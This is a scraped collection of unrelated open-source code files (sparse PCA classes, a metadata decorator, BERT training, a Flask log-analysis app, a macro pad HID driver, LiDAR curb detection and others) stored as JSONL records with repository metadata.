self._normalize_mat(B)\n        self.loadings = B\n        self.nonzero = np.count_nonzero(B)\n        self.zero = self.totloadings - self.nonzero\n        return self\n\n    def transform(self, X, y=None):\n        if self.alpha == 0:\n            return X @ self.pca_loadings\n        return X @ self.loadings\n\n    def _max_diff(self, X1, X2):\n        return np.max(np.abs(X1 - X2))\n\n    def _normalize_mat(self, X):\n        for i in range(X.shape[1]):\n            X[:, i] = X[:, i] / np.maximum(np.linalg.norm(X[:, i]), 1)\n        return X\n\n    def _criterion(self, x, XtX, alpha_j):\n        return (\n            (alpha_j - x).T @ XtX @ (alpha_j - x)\n            + self.alpha * self.l1_ratio * np.linalg.norm(x, 1)\n            + 0.5 * self.alpha * (1 - self.l1_ratio) * np.linalg.norm(x, 2)\n        )\n\n    def _enet_criterion(self, i, A, Sig_root):\n        return (\n            ElasticNet(alpha=self.alpha, l1_ratio=self.l1_ratio, fit_intercept=False, max_iter=14000)\n            .fit(Sig_root, Sig_root @ A[:, i])\n            .coef_\n        )\n\n\nclass LoadingsSPCA(SparsePCA):\n    \"\"\"\n    This class, LoadingsSPCA, is an altered version of the SparsePCA class from\n    scikit-learn (sklearn). The main difference is that LoadingsSPCA includes\n    an additional attribute, 'loadings', which saves the loadings from the PCA analysis.\n    The class uses the same parameters and methods as the sklearn SparsePCA class,\n    with the added functionality of saving the loadings for further analysis.\n\n    Parameters\n    ----------\n    n_components : int or None (default: None)\n        Number of sparse components to use. If None, use all the components\n    alpha : float (default: 1)\n        Sparsity controlling parameter. Higher values lead to sparser solutions\n    ridge_alpha : float (default: 0.01)\n        Amount of ridge shrinkage to apply in order to improve conditioning when\n        calling the transform method\n    max_iter : int (default: 1000)\n        Maximum number of iterations to perform\n    tol : float (default: 1e-8)\n        Tolerance for stopping criterion\n    method : {'lars', 'cd'} (default: 'lars')\n        lars: uses the least angle regression method to solve the lasso problem\n        cd: uses the coordinate descent method to compute the Lasso solution\n    n_jobs : int or None (default: None)\n        Number of parallel jobs to run. 
None means 1.\n        ``-1`` means using all processors.\n    U_init : array of shape (n_features, n_components)\n        Initial values for the loadings for warm restart scenarios\n    V_init : array of shape (n_samples, n_components)\n        Initial values for the codes for warm restart scenarios\n    verbose : bool (default: False)\n        If verbose is True the objective function and sparsity are printed at each\n        iteration\n    random_state : int, RandomState instance or None (default: None)\n        Seed of the pseudo random number generator to use when shuffling the data.\n\n    Attributes\n    ----------\n    components_ : array, [n_components, n_features]\n        Sparse components extracted from the data.\n    error_ : array\n        Vector of errors at each iteration\n    n_iter_ : int\n        Number of iterations run\n    loadings : array\n        The loadings from the PCA analysis\n\n    \"\"\"\n\n    def __init__(\n        self,\n        n_components=None,\n        *,\n        alpha=1,\n        ridge_alpha=0.01,\n        max_iter=1000,\n        tol=1e-8,\n        method=\"lars\",\n        n_jobs=None,\n        U_init=None,\n        V_init=None,\n        verbose=False,\n        random_state=None,\n    ):\n        super().__init__(\n            n_components=n_components,\n            alpha=alpha,\n            ridge_alpha=ridge_alpha,\n            max_iter=max_iter,\n            tol=tol,\n            method=method,\n            n_jobs=n_jobs,\n            verbose=verbose,\n            random_state=random_state,\n            U_init=U_init,\n            V_init=V_init,\n        )\n\n    def _fit(self, X, n_components, random_state):\n        # Transpose U and V for dictionary learning if they have been initialized\n        code_init = self.V_init.T if self.V_init is not None else None\n        dict_init = self.U_init.T if self.U_init is not None else None\n\n        # Perform dictionary learning to solve the PCA problem with l1 penalty on the components\n        code, dictionary, E, self.n_iter_ = dict_learning(\n            X.T,\n            n_components,\n            alpha=self.alpha,\n            tol=self.tol,\n            max_iter=self.max_iter,\n            method=self.method,\n            n_jobs=self.n_jobs,\n            verbose=self.verbose,\n            random_state=random_state,\n            code_init=code_init,\n            dict_init=dict_init,\n            return_n_iter=True,\n        )\n\n        # flip eigenvectors' sign to enforce deterministic output\n        code, dictionary = svd_flip(code, dictionary, u_based_decision=False)\n        self.components_ = code.T\n\n        # Normalize the components\n        components_norm = np.linalg.norm(self.components_, axis=1)[:, np.newaxis]\n        components_norm[components_norm == 0] = 1\n        self.components_ /= components_norm\n\n        # Set attributes\n        self.n_components_ = len(self.components_)\n        self.error_ = E\n\n        # Save loadings and amount of zero and nonzero elements\n        self.loadings = self.components_.T\n        self.nonzero = np.count_nonzero(self.loadings)\n        self.zero = self.loadings.shape[0] * self.loadings.shape[1] - self.nonzero\n\n        return self\n\n\nclass GeneSPCA(BaseEstimator, TransformerMixin):\n\n    \"\"\"\n    SKLearn compatible transformer implementing the SPCA variant\n    for gene expression data as described in \"Sparse Principal Component Analysis\" Zou et al (2006)\n    \"\"\"\n\n    def __init__(\n        self, n_components=20, max_iter=10000, tol=0.0001, improve_tol=0.00001, alpha=5\n    ):\n        self.max_iter = max_iter\n        self.tol = tol\n        self.improve_tol = improve_tol\n        self.n_components = n_components\n        self.n_comps = n_components\n        self.alpha = alpha\n        self.loadings = None\n        self.hasFit = False\n        self.nonzero = -1\n        self.zero = -1\n        self.totloadings = -1\n\n    def fit(self, X, y=None, verbose=0):\n\n        self.totloadings = self.n_components * X.shape[1]\n\n        if verbose:\n            # print(\"Progress based on max iterations:\")\n            pbar = tqdm(total=self.max_iter)\n\n        if isinstance(X, pd.DataFrame):\n            X = X.values\n\n        # Step 1: Setup first iteration\n        U, _, Vt = np.linalg.svd(X, 
full_matrices=False)\n A = Vt.T[:, : self.n_components]\n B = np.zeros((A[:, 0].shape[0], self.n_components))\n XtX = X.T @ X\n\n # Initialize progress monitors arbitrarily large\n diff, diff_improve = 100, 100\n iter = 0\n\n # Loop of step 2 and 3 until convergence / maxiter:\n while (\n iter < self.max_iter and diff > self.tol and diff_improve > self.improve_tol\n ):\n B_old = np.copy(B)\n\n # Update B (step 2*)\n input = A.T @ XtX\n for i in range(self.n_components):\n B[:, i] = self._soft_threshold(input[i, :], self.alpha)\n\n # Monitor change\n diff_old = diff\n diff = self._max_diff(B_old, B)\n diff_improve = np.abs(diff - diff_old)\n\n # print(diff)\n\n # Update A (step 3)\n A_old = A\n Un, s, Vnt = np.linalg.svd(XtX @ B, full_matrices=False)\n A = Un @ Vnt\n\n if verbose:\n pbar.update(1)\n iter = iter + 1\n if verbose:\n pbar.close()\n\n # Normalize loadings after loop\n B = self._normalize_mat(B)\n self.loadings = B\n self.nonzero = np.count_nonzero(B)\n self.zero = self.totloadings - self.nonzero\n return self\n\n def transform(self, X, y=None):\n return X @ self.loadings\n\n # Internal class helper functions\n def _soft_threshold(self, vec, l1):\n temp = np.maximum(0, (np.abs(vec) - l1 / 2))\n return temp * np.sign(vec)\n\n def _max_diff(self, X1, X2):\n return np.max(np.abs(X1 - X2))\n\n def _normalize_mat(self, X):\n for i in range(X.shape[1]):\n X[:, i] = X[:, i] / np.maximum(np.linalg.norm(X[:, i]), 1)\n return X\n\n\nclass AddFeatureNames(BaseSelector):\n \"\"\"Adds the feature names back to the transformed data.\"\"\"\n\n def __init__(\n self,\n feature_names: Optional[List[str]] = None,\n prefix: Optional[str] = \"feature_\",\n ):\n self.feature_names = feature_names\n self.prefix = prefix\n\n def fit(self, X: pd.DataFrame, y: pd.Series = None):\n \"\"\"Fit to data, then transform it.\"\"\"\n if self.feature_names is None:\n self.feature_names = [f\"{self.prefix}{i}\" for i in range(X.shape[1])]\n\n if len(self.feature_names) != X.shape[1]:\n raise ValueError(\n f\"Number of features in X ({X.shape[1]}) does not match \"\n f\"number of features in feature_names ({len(self.feature_names)}).\"\n )\n\n return self\n\n def transform(self, X: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Transforms the data.\"\"\"\n X = pd.DataFrame(X)\n X.columns = self.feature_names\n return X\n","repo_name":"jaccobroere/vu-case-study-eds","sub_path":"src/helpers/helper_classes.py","file_name":"helper_classes.py","file_ext":"py","file_size_in_byte":14062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26458505616","text":"\"\"\"\nMeta flags\n\nWe explicitly categorize some flags to be metaflags and define the semantics\nthat they can be changed without creating immutability issues. Hence, they will\nnever be part of the signature.\n\nThese meta flags are available to all the constructs\n(datasets, pipelines, fields, featuresets, extractors, individual features,\npipelines etc.)\n\nMeta flags are used to indicate the status of the object. 
They are used to\nindicate whether the object is deprecated, deleted, or a work in progress.\n\"\"\"\n\nimport functools\nimport re\n\nfrom typing import Any, List, Optional\n\nimport fennel.gen.metadata_pb2 as proto\nfrom fennel._vendor.pydantic import BaseModel, validator # type: ignore\n\nEMAIL_REGEX = r\"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$\"\nMETA_FIELD = \"__fennel_metadata__\"\n\n\nclass Metadata(BaseModel):\n owner: str\n tags: List[str]\n description: str\n deprecated: bool = False\n deleted: bool = False\n\n @validator(\"owner\")\n def owner_is_valid_email_address(cls, owner):\n if owner is None or owner == \"\":\n return owner\n if re.match(EMAIL_REGEX, owner) is None:\n raise ValueError(f\"Invalid email '{owner}'\")\n return owner\n\n\ndef meta(\n owner: str = \"\",\n description: str = \"\",\n tags: List[str] = [],\n deprecated: bool = False,\n deleted: bool = False,\n):\n \"\"\"meta decorator\n\n meta decorator is used to add a metadata object to the decorated object.\n It takes in the following arguments:\n Parameters\n ----------\n owner : str\n The owner of the object\n description : str\n A description of the object\n tags : List[str]\n A list of tags associated with the object\n deprecated : bool\n Whether the object is deprecated\n deleted : bool\n Whether the object is deleted\n \"\"\"\n\n @functools.wraps(meta)\n def decorator(obj: Any):\n meta = Metadata(\n owner=owner,\n description=description,\n tags=tags,\n deprecated=deprecated,\n deleted=deleted,\n )\n setattr(obj, META_FIELD, meta)\n return obj\n\n return decorator\n\n\ndef get_meta(obj: Any) -> Optional[Metadata]:\n if not hasattr(obj, META_FIELD):\n return None\n return getattr(obj, META_FIELD)\n\n\ndef get_meta_attr(obj: Any, attr: str) -> Any:\n meta = get_meta(obj)\n if meta is None:\n return None\n return getattr(meta, attr)\n\n\ndef set_meta_attr(obj: Any, attr: str, value: Any):\n meta = get_meta(obj)\n if meta is None:\n meta = Metadata(owner=\"\", description=\"\", tags=[])\n setattr(meta, attr, value)\n setattr(obj, META_FIELD, meta)\n\n\ndef get_metadata_proto(obj: Any) -> proto.Metadata:\n meta = get_meta(obj)\n if meta is None:\n return proto.Metadata()\n return proto.Metadata(\n owner=meta.owner,\n description=meta.description,\n tags=meta.tags,\n deprecated=meta.deprecated,\n deleted=meta.deleted,\n )\n","repo_name":"fennel-ai/client","sub_path":"fennel/lib/metadata/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"15578238409","text":"import torch\n\nfrom transformers import BertForSequenceClassification\nmodel = BertForSequenceClassification.from_pretrained('bert-base-uncased')\nmodel.train()\n\nfrom transformers import AdamW\nno_decay = ['bias', 'LayerNorm.weight']\noptimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n]\noptimizer = AdamW(optimizer_grouped_parameters, lr=1e-5)\n\nfrom main import load_txts\ntxt_dir = '../TXT_165/'\n\ntxts = load_txts(txt_dir)\n\nimport spacy\nnlp = spacy.load('en_core_web_sm')\nraw_text = txts[0]\ndoc = nlp(raw_text)\nsentences = [sent.text.strip() for sent in doc.sents]\nprint(sentences)\n\nfrom transformers import BertTokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nfor 
sentence in sentences:\n    encoding = tokenizer(sentence, return_tensors='pt', padding=True, truncation=True)\n    input_ids = encoding['input_ids']\n    attention_mask = encoding['attention_mask']\n\n    optimizer.zero_grad()  # clear gradients accumulated from the previous sentence\n    labels = torch.tensor([1]).unsqueeze(0)  # one class index per example; a [1, 0, 0] vector would not match the (batch, num_labels) logits\n    outputs = model(input_ids, attention_mask=attention_mask, labels=labels)\n    loss = outputs.loss\n    loss.backward()\n    optimizer.step()\n\nprint(outputs.logits)","repo_name":"fernandapinodelgado/NDC-Project","sub_path":"src/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"}
{"seq_id":"14182682701","text":"'''\nTime: O(N)\nSpace: O(1)\n\nResult: Accepted\nRuntime: 20 ms, beats 63.86% of Python submissions\nMemory: 12.9 MB, beats 61.45% of Python submissions\n'''\n\nclass Solution(object):\n    def totalMoney(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n        total = x_th = 0\n        for i in range(n):\n            if i % 7 == 0:\n                x_th += 1\n                current_base = x_th\n            total += current_base + (i % 7)\n\n        return total\n\n\n'''\nTime: O(1)\nSpace: O(1)\n\nRuntime: 32 ms, beats 76.68% of Python3 submissions\nMemory: 14.9 MB, beats 63.68% of Python3 submissions\nTest cases passed: 106 / 106\n'''\nclass Solution:\n    def totalMoney(self, n: int) -> int:\n        q, r = divmod(n, 7)\n        # 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28\n        # 28, 28 + (q - 1) * 7\n        m1 = (28 + 28 + (q - 1) * 7) * q // 2\n        # 1 + q, 1 + q + r - 1\n        m2 = (1 + q + q + r) * r // 2\n        return m1 + m2\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/1716.0_Calculate_Money_in_Leetcode_Bank.py","file_name":"1716.0_Calculate_Money_in_Leetcode_Bank.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"13936690194","text":"import random\n\ndef get_town(map_size):\n    x = random.randint(0, map_size)\n    y = random.randint(0, map_size)\n    return (x, y)\n\ndef get_instance_string(quantity, map_size):\n    instance = f\"{quantity}\\n\"\n\n    for i in range(quantity):\n        x, y = get_town(map_size)\n        instance += f'{i + 1} {x} {y}\\n'\n\n    return instance\n\nprint(get_instance_string(6, 1000))","repo_name":"mudziok/ok","sub_path":"gen_instances.py","file_name":"gen_instances.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"32783368274","text":"# -*- encoding: utf-8 -*-\nfrom . 
import db\n\nfrom lazyblacksmith.models.utcdatetime import UTCDateTime\nfrom lazyblacksmith.utils.time import utcnow\n\nfrom sqlalchemy import func\n\n\nclass ItemPrice(db.Model):\n item_id = db.Column(db.Integer, primary_key=True, autoincrement=False)\n region_id = db.Column(db.Integer, primary_key=True)\n sell_price = db.Column(\n db.Numeric(\n precision=17,\n scale=2,\n decimal_return_scale=2,\n asdecimal=False\n ),\n nullable=True\n )\n buy_price = db.Column(\n db.Numeric(\n precision=17,\n scale=2,\n decimal_return_scale=2,\n asdecimal=False\n ),\n nullable=True\n )\n updated_at = db.Column(\n UTCDateTime(timezone=True), server_default=func.now()\n )\n\n def get_delta_update(self):\n return self.updated_at - utcnow()\n","repo_name":"Kyria/LazyBlacksmith","sub_path":"lazyblacksmith/models/api/item_price.py","file_name":"item_price.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"75"} +{"seq_id":"16818503415","text":"# https://sumo.dlr.de/docs/Tools/Sumolib.html#locate_nearby_edges_based_on_the_geo-coordinate\n# https://sumo.dlr.de/pydoc/sumolib.html\n\nimport sumolib\n\n# parse the net\nnet = sumolib.net.readNet('./cologne_scenario/cologne.net.xml')\n\nedge = net.getEdge('-132409814#4')\nfromId = edge.getFromNode()\ntoId = edge.getToNode()\nfromCoord = fromId.getCoord()\ntoCoord = toId.getCoord()\nlon, lat = net.convertXY2LonLat(fromCoord[0], fromCoord[1])\n\nprint(edge)\nprint(fromId, toId)\nprint(fromCoord, toCoord)\nprint(lat, \",\", lon)\n\n\n# locate nearby edges based on the geo-coordinate\n# This requires the module pyproj to be installed. For larger networks rtree is also strongly recommended.\nradius = 0.12\nx, y = net.convertLonLat2XY(7.013019057413672, 50.94135355923195)\nedges = net.getNeighboringEdges(x, y, radius)\n\n\nclosest = (float('inf'), None)\nfor edge, distance in edges:\n print(edge, distance)\n if distance < closest[0]:\n closest = (distance, edge)\n\nprint(closest)\n\n# # pick the closest edge\n# if len(edges) > 0:\n# distancesAndEdges = sorted([(dist, edge) for edge, dist in edges])\n# dist, closestEdge = distancesAndEdges[0]\n# #\n# # print(dist, closestEdge)\n","repo_name":"farima-pixel/ATHENA","sub_path":"helper/locate_nearby_edges.py","file_name":"locate_nearby_edges.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10001688333","text":"from abc import ABC, abstractmethod\nfrom typing import Any, Dict, Optional, cast\n\nimport aiohttp\n\n\nclass RemoteAPI(ABC):\n @property\n @abstractmethod\n def base_url(self) -> str:\n ...\n\n @property\n def _headers(self) -> Dict[str, str]:\n return {}\n\n async def __aenter__(self) -> \"RemoteAPI\":\n self._session: Optional[aiohttp.ClientSession] = aiohttp.ClientSession(\n raise_for_status=True, headers=self._headers\n )\n return self\n\n async def __aexit__(self, *err: Any) -> None:\n assert self._session is not None\n await self._session.close()\n self._session = None\n\n async def _get(self, path: str, **kwargs: Any) -> Dict[\"str\", Any]:\n assert self._session is not None\n async with self._session.get(f\"{self.base_url}{path}\", **kwargs) as resp:\n return cast(Dict[\"str\", Any], await resp.json())\n\n async def _post(self, path: str, **kwargs: Any) -> Dict[\"str\", Any]:\n assert self._session is not None\n async with self._session.post(f\"{self.base_url}{path}\", **kwargs) as resp:\n return cast(Dict[\"str\", Any], 
await resp.json())\n","repo_name":"tyra314/modweaver","sub_path":"modweaver/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"}
{"seq_id":"20741817151","text":"# coding: utf-8\nimport requests\nimport slackbot_settings\n\nKEY1 = slackbot_settings.KEY1\n\n# endpoint to use when the resource's location is registered as East Asia\nendpoint = 'https://eastasia.api.cognitive.microsoft.com/vision/v1.0/ocr'\n\ndef get_text_by_ms(image=None):\n    params = {'visualFeatures': 'Categories,Description,Color'}\n\n    headers = {\n        'Ocp-Apim-Subscription-Key': KEY1,\n        \"Content-Type\": \"application/octet-stream\"\n    }\n    response = requests.post(\n        endpoint,\n        headers=headers,\n        params=params,\n        data=image,\n    )\n\n    status = response.status_code\n    data = response.json()\n\n    if status != 200:\n\n        if data['code'] == 'InvalidImageSize':\n            text = '画像のサイズが大きすぎます'\n\n        elif data['code'] == 'InvalidImageUrl':\n            text = 'この画像URLからは取得できません'\n\n        elif data['code'] == 'InvalidImageFormat':\n            text = '対応していない画像形式です'\n\n        else:\n            text = 'エラーが発生しました'\n\n        print(status, data)\n        return text\n\n    text = ''\n    for region in data['regions']:\n        for line in region['lines']:\n            for word in line['words']:\n                text += word.get('text', '')\n                if data['language'] != 'ja':\n                    text += ' '\n            text += '\\n'\n\n    if len(text) == 0:\n        text += '文字が検出できませんでした'\n\n    print('text:', text)\n    return text\n\n\nif __name__ == \"__main__\":\n    get_text_by_ms()  # smoke test without an image payload\n","repo_name":"slack-evolbot/main-repository","sub_path":"src_teamA/ocr_bot/vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"73424105843","text":"#!/usr/bin/env python3\n\nimport psycopg2\nfrom flask import Flask, request, redirect, url_for\n\n\nDBNAME = 'news'\n\n\ndef get_popular3articles():\n    \"\"\"Return most popular three articles of all time\"\"\"\n    db = psycopg2.connect(database=DBNAME)\n    cur = db.cursor()\n    query = \"\"\" SELECT a.title, count(l.path) as views\n                FROM articles a, log l\n                WHERE l.path like '/article/' || a.slug\n                AND l.status like '%200%'\n                GROUP BY a.title\n                ORDER BY views desc\n                LIMIT 3\n            \"\"\"\n    cur.execute(query)\n    results = cur.fetchall()\n    db.close()\n    return results\n\n\ndef get_popular_articles_authors():\n    \"\"\"Return the most popular article authors of all time\"\"\"\n    db = psycopg2.connect(database=DBNAME)\n    cur = db.cursor()\n    query = \"\"\" SELECT au.name, count(l.path) as views\n                FROM log l, articles a\n                LEFT JOIN authors au\n                ON a.author = au.id\n                WHERE l.path like '/article/' || a.slug\n                AND l.status like '%200%'\n                GROUP BY au.name\n                ORDER BY views desc\n            \"\"\"\n    cur.execute(query)\n    results = cur.fetchall()\n    db.close()\n    return results\n\n\ndef get_error_days():\n    \"\"\"Return days on which more than 1% of requests led to errors\"\"\"\n    db = psycopg2.connect(database=DBNAME)\n    cur = db.cursor()\n    query = \"\"\" SELECT a.fdate, (a.failed*100.0/b.total) as percent\n                FROM (SELECT date(time) as fdate, count(*) as failed\n                      FROM log\n                      WHERE status like '%404%'\n                      GROUP BY date(time)) as a\n                JOIN (SELECT date(time), count(*) as total\n                      FROM log\n                      GROUP BY date(time)) as b\n                ON a.fdate = b.date\n                AND (a.failed*100.0/b.total) > 1.0\n            \"\"\"\n    cur.execute(query)\n    results = cur.fetchall()\n    db.close()\n    return results\n\n\napp = Flask(__name__)\n\n# HTML template for the Log Analysis page\nHTML_WRAP = '''\\\n<!DOCTYPE html>\n<html>\n  <head>\n    <title>Log Analysis</title>\n  </head>\n  <body>\n    <h1>Log Analysis</h1>\n
    <table>\n%s\n    </table>\n  </body>\n</html>\n'''\n\n# HTML template for an individual result row\nPOST = '''\\\n    <tr><td>%s</td><td>%s</td></tr>\n
'''\n\n\n@app.route('/', methods=['GET'])\ndef main():\n    '''Main page for the Analysis.'''\n    posts = ''\n    html = HTML_WRAP % posts\n    return html\n\n\n@app.route('/popular_articles')\ndef popular_articles():\n    \"\"\"Fetch the three most popular articles.\"\"\"\n    posts = \"\".join(\n        POST % (title, views) for title, views in get_popular3articles())\n    html = HTML_WRAP % posts\n    return html\n\n\n@app.route('/popular_authors')\ndef popular_authors():\n    \"\"\"Fetch the most popular authors.\"\"\"\n    posts = \"\".join(\n        POST % (name, views) for name, views in get_popular_articles_authors())\n    html = HTML_WRAP % posts\n    return html\n\n\n@app.route('/error_days')\ndef error_days():\n    \"\"\"Fetch the days on which more than 1% of requests led to errors.\"\"\"\n    posts = \"\".join(\n        POST % (fdate, round(percent, 2))\n        for fdate, percent in get_error_days())\n    html = HTML_WRAP % posts\n    return html\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8000)\n# Run as python log_analysis/log_analysis.py\n","repo_name":"domadn1/log-analysis-app","sub_path":"log_analysis.py","file_name":"log_analysis.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"11153691518","text":"import usb_hid\r\nfrom adafruit_hid.keyboard import Keyboard\r\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\r\nfrom adafruit_hid.keycode import Keycode\r\n\r\nfrom adafruit_hid.consumer_control import ConsumerControl\r\nfrom adafruit_hid.consumer_control_code import ConsumerControlCode\r\n\r\ntry:\r\n    from typing import Tuple\r\nexcept ImportError:\r\n    pass\r\n\r\n\r\nclass Command(object):\r\n    def __init__(self, label: str, type: str, color: Tuple[int, int, int], keys, control: str, text: str):\r\n        self.label = label\r\n        self.type = type\r\n        self.color = color\r\n        self.keys = keys\r\n        self.keys_parsed = []\r\n        self.text = text\r\n        self.control = control\r\n        self.control_parsed = None\r\n\r\n    def __repr__(self) -> str:\r\n        return f\"Command(label={self.label}, type={self.type}, color={self.color}, keys={self.keys}, control={self.control}, text={self.text})\"\r\n    \r\n    def __str__(self) -> str:\r\n        return self.__repr__()\r\n\r\n    @staticmethod\r\n    def from_dict(d: dict):\r\n        print(f\"Creating command from dict: {d}\")\r\n        command = Command(\r\n            d.get('label', 'Unknown'),\r\n            d.get('type', None),\r\n            d.get('color', (0, 0, 0)),\r\n            d.get('keys', None),\r\n            d.get('control', None),\r\n            d.get('text', None)\r\n        )\r\n\r\n        if command.type == 'key':\r\n            if command.keys is None:\r\n                raise Exception(f\"Key command must have keys defined: {command}\")\r\n            for key in command.keys:\r\n                if not hasattr(Keycode, key):\r\n                    raise Exception(f\"Invalid key: {key}\")\r\n                else:\r\n                    command.keys_parsed.append(getattr(Keycode, key))\r\n                    print(f\"Converted key: {key} to {getattr(Keycode, key)}\")\r\n        if command.type == 'text':\r\n            if command.text is None:\r\n                raise Exception(f\"Text command must have text defined: {command}\")\r\n        if command.type == 'control':\r\n            if command.control is None:\r\n                raise Exception(f\"Control command must have control defined: {command}\")\r\n            if not hasattr(ConsumerControlCode, command.control):\r\n                raise Exception(f\"Invalid control: {command.control}\")\r\n            else:\r\n                command.control_parsed = getattr(ConsumerControlCode, command.control)\r\n        return command\r\n\r\n\r\nclass Control:\r\n    def __init__(self):\r\n        # Set up the keyboard and layout\r\n        self.keyboard = Keyboard(usb_hid.devices)\r\n        self.layout = KeyboardLayoutUS(self.keyboard)\r\n\r\n        # Set 
up consumer control (used to send media key presses)\r\n self.consumer_control = ConsumerControl(usb_hid.devices)\r\n\r\n def send(self, command):\r\n if command.type == 'key':\r\n self.keyboard.press(*command.keys_parsed)\r\n elif command.type == 'text':\r\n self.layout.write(command.text)\r\n elif command.type == 'control':\r\n self.consumer_control.send(command.control_parsed)\r\n else:\r\n print(f\"Send Control not implemented: {command}\")\r\n \r\n def press(self, command):\r\n print(f\"Pressing command: {command}\")\r\n if command.type == 'key':\r\n print(f\"Pressing key: {command.keys_parsed}\")\r\n self.keyboard.send(*command.keys_parsed)\r\n elif command.type == 'text':\r\n self.layout.write(command.text)\r\n elif command.type == 'control':\r\n self.consumer_control.send(command.control_parsed)\r\n else:\r\n print(f\"Press Control not implemented: {command}\")\r\n\r\n def release(self, command):\r\n print(f\"Releasing command: {command}\")\r\n if command.type == 'key':\r\n print(f\"Releasing key: {command.keys_parsed}\")\r\n self.keyboard.release(*command.keys_parsed)\r\n elif command.type == 'text':\r\n pass\r\n elif command.type == 'control':\r\n pass\r\n else:\r\n print(f\"Release Control not implemented: {command}\")","repo_name":"ntindle/Keybow2040-Macro-Pad","sub_path":"lib/macro_pad/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6922275866","text":"import numpy as np\nimport open3d as o3d\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.ndimage import gaussian_filter1d\nfrom scipy import signal\nfrom skimage.measure import LineModel, ransac\nimport utility\nimport time\n\ntheta = np.array([-15, -13, -11, -9, -7, -5, -4])\n\nfor pts_itr in range(1,160,5):\n pts = np.load(str(pts_itr)+'.npy')\n print(\"loaded: \" + str(pts_itr) + \".npy\")\n N_SCAN = 16\n Horizon_SCAN = 1800\n ang_res_x = 0.2\n ang_res_y = 2.0\n ang_bottom = 15.0+0.1\n\n range_image = np.zeros((N_SCAN,1800,7))\n augmented_range_image = np.zeros(range_image.shape)\n dist = []\n\n start_time = time.time()\n\n pc = pts[pts[:,4] < 6]\n aug_start = time.time()\n\n for pt in pc:\n horizonAngle = math.atan2(pt[1], pt[0]) * 180 / math.pi\n dist = np.sqrt(np.square(pt[0]) + np.square(pt[1]) + np.square(pt[2]))\n if(horizonAngle < 60 and horizonAngle > -60) and dist > 1 and dist < 40:\n columnIdx = round(-1*horizonAngle/ang_res_x) + 450\n range_image[int(pt[4]),int(columnIdx),:5] = pt\n range_image[int(pt[4]),int(columnIdx),6] = np.sqrt(np.square(pt[0]) + np.square(pt[1]))\n\n for i in range(6):\n augmented_range_image[i,:,0] = utility.simple_augment_holes(range_image[i,:,0].copy(),.1)\n augmented_range_image[i,:,1] = utility.simple_augment_holes(range_image[i,:,1].copy(),.1)\n augmented_range_image[i,:,2] = utility.simple_augment_holes(range_image[i,:,2].copy(),.1)\n augmented_range_image[i,:,6] = utility.simple_augment_holes(range_image[i,:,6].copy(),.1)\n\n ifl_img = []\n curb_pts = []\n left_curb_pts = []\n right_curb_pts = []\n\n print(\"aug time: \" + str(time.time() - aug_start))\n\n for i in range(0,5):\n # hist,_ = np.histogram(augmented_range_image[i,:,6], bins=50,range=(2,40))\n # max_val = _[hist.argmax()] + 3\n\n hist,_ = np.histogram(augmented_range_image[i,:,2], bins=50,range=(-2,-1))\n max_val = _[hist.argmax()] + .2\n\n print(\"max_val: \"+ str(max_val))\n\n sm_x = gaussian_filter1d(augmented_range_image[i,:,0], 2)\n sm_y = 
gaussian_filter1d(augmented_range_image[i,:,1], 2)\n        dx = np.gradient(sm_x)\n        dy = np.gradient(sm_y)\n        m = np.arctan2(dy,dx)\n        m_filt = signal.medfilt(m,11)\n\n        poi_start = time.time()\n        infl_pts = utility.poi_5(m_filt, augmented_range_image[i,:,:], max_val)\n        # max_dist = np.max(augmented_range_image[i,augmented_range_image[i,:,5] > 0,6])\n\n        # print(\"poi time: \" + str(time.time() - poi_start))\n\n        # left_curb = np.array([0,10,0])\n        # right_curb = np.array([0,-10,0])\n        left_pts = []\n        right_pts = []\n\n        min_dist = _[hist.argmax()] / np.tan(np.radians(theta[i]))\n\n        for j in range(infl_pts.shape[0]):\n            infl_idx = int(infl_pts[j,0])\n            if abs(augmented_range_image[i,infl_idx,1]) <= 11 and abs(augmented_range_image[i,infl_idx,1]) >= 0.5 and abs(augmented_range_image[i,infl_idx,6] - min_dist) < 3:\n                # if augmented_range_image[i,int(infl_pts[j,0]),6] < max_dist+0.5 and augmented_range_image[i,int(infl_pts[j,0]),6] > max_dist-2:\n                